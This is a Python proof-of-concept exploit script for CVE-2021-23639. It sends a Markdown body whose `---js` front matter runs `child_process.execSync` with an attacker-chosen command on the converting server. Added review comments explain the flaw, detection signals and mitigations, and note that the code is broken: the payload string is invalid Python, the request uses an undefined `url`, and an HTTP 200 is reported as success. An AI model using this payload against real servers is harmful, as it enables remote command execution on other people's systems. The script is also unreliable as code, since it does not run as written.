POC / cve-2021-23639.py PY
import requests
import argparse

def exploit(target_url, command):
    """POST a Markdown body with a ``---js`` front-matter block and report the HTTP status.

    Proof-of-concept request for CVE-2021-23639 (labelled "md2pdf" by the
    author in the argparse description of this file).

    Args:
        target_url: URL of the conversion endpoint. NOTE(review): this
            parameter is never referenced in the body as listed.
        command: text interpolated verbatim into the front-matter block.

    Returns:
        None. The outcome is printed, based only on the HTTP status code.
    """

    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # The body is a Markdown document whose front matter opens with a `---js`
    # fence and closes with `---`.
    # NOTE(review): to my knowledge the underlying flaw is that the converter
    # parses front matter with gray-matter while its JavaScript engine is left
    # enabled, so a `---js` block is evaluated inside the server's Node.js
    # process -- confirm against the advisory.
    # Defender view: Markdown input that opens with a `---js` fence, and child
    # processes spawned by the PDF conversion service, are the signals worth
    # alerting on. Mitigation is upgrading to a release that disables that
    # engine, and running the converter unprivileged and sandboxed.
    # NOTE(review): as published, this line is not a valid Python string
    # literal (the inner double quotes terminate the f-string), so the file
    # does not parse and is not a working artifact.
    data = f"---js\n((require("child_process")).execSync({command}))\n---RCE"

    # verify=False disables TLS certificate validation for this request.
    # NOTE(review): `url` is not defined anywhere in the visible listing, and
    # no timeout is passed, so the call can block indefinitely.
    response = requests.post(url, headers=headers, data=data, verify=False)

    # A 200 only means the endpoint answered; it is not evidence that anything
    # was evaluated server-side. Decide whether a host is affected from its
    # installed package version, not from this message.
    if response.status_code == 200:
        print(f"[+] Exploit sent successfully! Check the server output.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")


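if __name__ == '__main__':
    # Command-line entry point: two required positionals are parsed and passed
    # to exploit() unchanged; neither value is validated here.
    # The description previously read "CVE-2021-23639O"; the stray trailing
    # letter is removed so the identifier matches the file name and can be
    # searched for.
    # NOTE(review): the CVE record, as far as I know, names the npm package
    # md-to-pdf; "md2pdf" is the author's label -- confirm before using it
    # for inventory matching.
    parser = argparse.ArgumentParser(description="Exploit CVE-2021-23639 - md2pdf")

    parser.add_argument('target', help="complete URL of the vulnerable website")
    parser.add_argument('cmd', help="Command to run on the vulnerable system")

    args = parser.parse_args()
    exploit(args.target, args.cmd)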